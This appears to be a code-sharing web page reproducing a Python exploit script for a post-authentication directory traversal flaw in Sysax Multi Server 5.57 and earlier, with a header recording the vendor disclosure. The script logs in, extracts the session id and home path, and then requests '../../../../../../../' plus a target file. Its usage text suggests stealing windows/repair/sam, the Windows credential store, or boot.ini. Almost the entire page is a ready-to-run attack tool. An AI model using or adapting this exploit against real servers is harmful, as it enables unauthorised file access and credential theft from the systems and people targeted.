扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit and Server 2003 SP2 32bit #Date Discovered: March 27, 2012 #Vendor Contacted: March 29, 2012 #Vendor Response: April 3, 2012 #Vendor Fixed: (Currently working on fix, check my site for update) #Details: http://www.pwnag3.com/2012/04/sysax-directory-traversal-exploit.html ########################################################################################################## import socket,sys,time,re,base64,urllib def main(): #base64 encode the provided creds creds = base64.encodestring(user+"\x0a"+password) print "\n" print "****************************************************************************" print " Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)" print " by @cd1zz www.pwnag3.com" print " Getting "+getfile+" from " + target + " on port " + str(port) print "****************************************************************************" #setup post for login login = "POST /scgi?sid=0&pid=dologin HTTP/1.1\r\n" login += "Host: \r\n" login += "http://"+target+"/scgi?sid=0&pid=dologin\r\n" login += "Content-Type: application/x-www-form-urlencoded\r\n" login += "Content-Length: 15\r\n\r\n" login += "fd="+creds+"\n\n" #send post and login creds try: r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) print "[*] Logging in" r.send(login) except Exception, e: print "[-] Could not login" print e #loop the recv sock so we get the full page page = '' fullpage = '' while "</html>" not in fullpage: page = r.recv(4096) fullpage += page time.sleep(1) #regex the sid from the page global sid sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M) if sid is None: print "[x] Could not login. User and pass correct?" sys.exit(1) time.sleep(1) #regex to find user's path print "[*] Finding your home path" global path path = re.search(r'file=[a-zA-Z]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M) time.sleep(1) #if that doesn't work, try to upload a file and check again if path is None: print "[-] No files found, I will try to upload one for you." print "[-] If you don't have rights to do this, it will fail." upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1\r\n" upload += "Host:\r\n" upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620\r\n" upload += "Content-Length: 219\r\n\r\n" upload += "-----------------------------97336096252362005297691620\r\n" upload += "Content-Disposition: form-data; name=\"upload_file\"; filename=\"file.txt\"\r\n" upload += "Content-Type: text/plain\r\n" upload += "-----------------------------97336096252362005297691620--\r\n\r\n" u = socket.socket(socket.AF_INET,socket.SOCK_STREAM) u.connect((target, port)) u.send(upload + "\r\n") page = '' fullpage = '' while "</html>" not in fullpage: page = u.recv(4096) fullpage += page path = re.search(r'file=[a-zA-Z0-9]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M) time.sleep(2) if path is None: print "\n[x] It failed, you probably don't have rights to upload." print "[x] Please retry the script a few times." print "[x] You need at least one file in the directory because we need" print "[x] to append our directory traversal to the end of your path." sys.exit(1) print "[+] Got it => " + path.group(0) time.sleep(1) r.close() def dirtrav(): #here is the dir trav url = "http://"+target+"/scgi?"+str(sid.group(0))+"&"+path.group(0)+"../../../../../../../"+getfile try: retrieved_file = urllib.urlopen(url) filename = raw_input("[+] Got your file. What file name do you want to save it as?") output = open(filename,'wb') output.write(retrieved_file.read()) output.close() print "[*] Done!" except Exception, e: print "[x] Either the file doesn't exist or you mistyped it. Error below:" print "[x] You can also try to browse this site manually:" print "[x] " + url print e def keepgoing(): cont = raw_input("[*] Do you want another file (y/n)? ") while cont == "y": global getfile getfile = raw_input("[*] Enter the location of the new file: ") dirtrav() cont = raw_input("[*] Do you want another file (y/n)? ") else: sys.exit(1) if __name__ == '__main__': if len(sys.argv) != 6: print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <File>" print "[+] File examples => windows/repair/sam or boot.ini" sys.exit(1) target, port, user, password, getfile = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5] main() dirtrav() keepgoing() |
体验盒子
